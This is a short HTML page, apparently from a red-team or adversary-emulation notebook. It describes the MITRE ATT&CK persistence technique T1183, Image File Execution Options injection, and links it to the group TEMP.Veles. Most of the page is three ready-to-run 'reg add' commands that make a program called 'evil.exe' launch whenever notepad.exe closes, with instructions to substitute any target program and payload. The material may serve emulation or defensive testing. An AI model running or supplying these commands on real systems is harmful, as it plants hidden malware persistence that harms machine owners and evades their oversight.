<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Persistence</title>
</head><body><span style="font-size: 14pt"><span style="color: #ff0000">Persistence </span></span><a href="
https://attack.mitre.org/techniques/T1183/"><br/>
</a><a href="
https://attack.mitre.org/techniques/T1183/"><br/>
</a><a href="
https://attack.mitre.org/techniques/T1183/">https://attack.mitre.org/techniques/T1183/ </a>Image File Execution Options Injection<br/>
<br/>
APT Groups - TEMP.Veles &nbsp;<br/>
&nbsp;<br/>
<span style="font-size: 14pt">Admin Access Only </span>&nbsp; <br/>
<br/>
The below commands will run the "evil.exe" command everytime notepad is closed - replace notepad with the program you desire and evil.exe with the program you desire - For us we will use C:\humscript\HUMWIN.exe<br/>
<br/>
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512<br/>
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1<br/>
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"<br/>
<br/>
<br/>
&nbsp;<br/>
<br/>
<br/>
<br/>
<br/>
</body></html>